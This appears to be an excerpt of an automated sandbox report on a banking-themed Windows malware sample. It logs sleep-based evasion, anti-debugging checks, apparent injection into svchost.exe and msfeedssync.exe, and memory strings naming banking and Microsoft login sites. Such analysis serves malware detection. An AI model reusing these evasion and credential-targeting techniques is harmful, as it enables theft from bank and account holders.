Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe TID: 1424	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe TID: 1424	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe TID: 1424	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe TID: 1424	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe TID: 1424	Thread sleep time: -37000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msfeedssync.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msfeedssync.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0069445A
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069C6D1 FindFirstFileW,FindClose,	0_2_0069C6D1
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0069C75C
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0069EF95
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0069F0F2
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0069F3F3
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006937EF
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00693B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00693B12
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0069BCBC
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C1C680 FindFirstFileW,FindNextFileW,FindClose,	6_2_02C1C680

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006349A0

Source: 1euF2H00K.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 1euF2H00K.6.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 1euF2H00K.6.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 1euF2H00K.6.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 1euF2H00K.6.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 1euF2H00K.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: msfeedssync.exe, 00000006.00000002.3847343312.0000000002E32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll )4
Source: 1euF2H00K.6.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 1euF2H00K.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 1euF2H00K.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 1euF2H00K.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 1euF2H00K.6.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 1euF2H00K.6.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 1euF2H00K.6.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 1euF2H00K.6.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 1euF2H00K.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 6tskSK4rGcXjRtb8E.exe, 00000007.00000002.3847524336.000000000074A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.1943736953.000001EE7CBFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 1euF2H00K.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 1euF2H00K.6.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 1euF2H00K.6.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 1euF2H00K.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 1euF2H00K.6.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 1euF2H00K.6.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 1euF2H00K.6.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 1euF2H00K.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 1euF2H00K.6.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 1euF2H00K.6.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 1euF2H00K.6.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 1euF2H00K.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 1euF2H00K.6.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 1euF2H00K.6.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 1euF2H00K.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 1euF2H00K.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

API call chain: ExitProcess graph end node

graph_0-101565

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0377096E rdtsc

1_2_0377096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417853 LdrLoadDll,

1_2_00417853

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006A3F09 BlockInput,

0_2_006A3F09

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00633B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00633B3A

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00665A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00665A7C

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00634B37 LoadLibraryA,GetProcAddress,

0_2_00634B37

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00E530F8 mov eax, dword ptr fs:[00000030h]	0_2_00E530F8
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00E546F8 mov eax, dword ptr fs:[00000030h]	0_2_00E546F8
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00E54758 mov eax, dword ptr fs:[00000030h]	0_2_00E54758
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D437C mov eax, dword ptr fs:[00000030h]	1_2_037D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov ecx, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]	1_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FA352 mov eax, dword ptr fs:[00000030h]	1_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D8350 mov ecx, dword ptr fs:[00000030h]	1_2_037D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]	1_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372C310 mov ecx, dword ptr fs:[00000030h]	1_2_0372C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03750310 mov ecx, dword ptr fs:[00000030h]	1_2_03750310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]	1_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]	1_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]	1_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037663FF mov eax, dword ptr fs:[00000030h]	1_2_037663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]	1_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]	1_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03808324 mov ecx, dword ptr fs:[00000030h]	1_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]	1_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03808324 mov eax, dword ptr fs:[00000030h]	1_2_03808324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]	1_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]	1_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]	1_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]	1_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]	1_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EC3CD mov eax, dword ptr fs:[00000030h]	1_2_037EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]	1_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]	1_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]	1_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]	1_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B63C0 mov eax, dword ptr fs:[00000030h]	1_2_037B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0380634F mov eax, dword ptr fs:[00000030h]	1_2_0380634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]	1_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]	1_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]	1_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]	1_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]	1_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]	1_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]	1_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]	1_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]	1_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]	1_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]	1_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372826B mov eax, dword ptr fs:[00000030h]	1_2_0372826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A250 mov eax, dword ptr fs:[00000030h]	1_2_0372A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736259 mov eax, dword ptr fs:[00000030h]	1_2_03736259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]	1_2_037EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]	1_2_037EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B8243 mov eax, dword ptr fs:[00000030h]	1_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B8243 mov ecx, dword ptr fs:[00000030h]	1_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372823B mov eax, dword ptr fs:[00000030h]	1_2_0372823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038062D6 mov eax, dword ptr fs:[00000030h]	1_2_038062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]	1_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]	1_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]	1_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]	1_2_037402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]	1_2_037402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]	1_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0380625D mov eax, dword ptr fs:[00000030h]	1_2_0380625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]	1_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]	1_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]	1_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]	1_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]	1_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372C156 mov eax, dword ptr fs:[00000030h]	1_2_0372C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C8158 mov eax, dword ptr fs:[00000030h]	1_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]	1_2_03736154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]	1_2_03736154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]	1_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]	1_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C4144 mov ecx, dword ptr fs:[00000030h]	1_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]	1_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]	1_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03760124 mov eax, dword ptr fs:[00000030h]	1_2_03760124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DA118 mov ecx, dword ptr fs:[00000030h]	1_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]	1_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]	1_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]	1_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038061E5 mov eax, dword ptr fs:[00000030h]	1_2_038061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F0115 mov eax, dword ptr fs:[00000030h]	1_2_037F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]	1_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037601F8 mov eax, dword ptr fs:[00000030h]	1_2_037601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_037AE1D0
